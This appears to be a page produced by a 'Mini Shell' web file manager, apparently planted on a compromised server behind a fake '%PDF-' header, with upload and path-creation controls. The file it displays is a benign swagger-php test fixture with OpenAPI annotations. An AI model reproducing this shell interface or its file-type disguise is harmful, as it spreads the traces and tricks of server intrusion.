%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/shaban/duassis/api/vendor/zircote/swagger-php/tests/Fixtures/
Upload File :
Create Path :
Current File : //var/www/html/shaban/duassis/api/vendor/zircote/swagger-php/tests/Fixtures/UsingPhpDoc.php

<?php declare(strict_types=1);

namespace OpenApiFixtures;

/**
 * @OA\Info(title="Fixture for AugmentOperationTest", version="test")
 */
class UsingPhpDoc
{
    /**
     * Example summary
     *
     * Example description...
     * More description...
     *
     * @OA\Get(path="api/test1", @OA\Response(response="200", description="a response"))
     */
    public function methodWithDescription()
    {
    }

    /**
     * Example summary
     *
     * @OA\Get(path="api/test2", @OA\Response(response="200", description="a response"))
     */
    public function methodWithSummary()
    {
    }
}

Zerion Mini Shell 1.0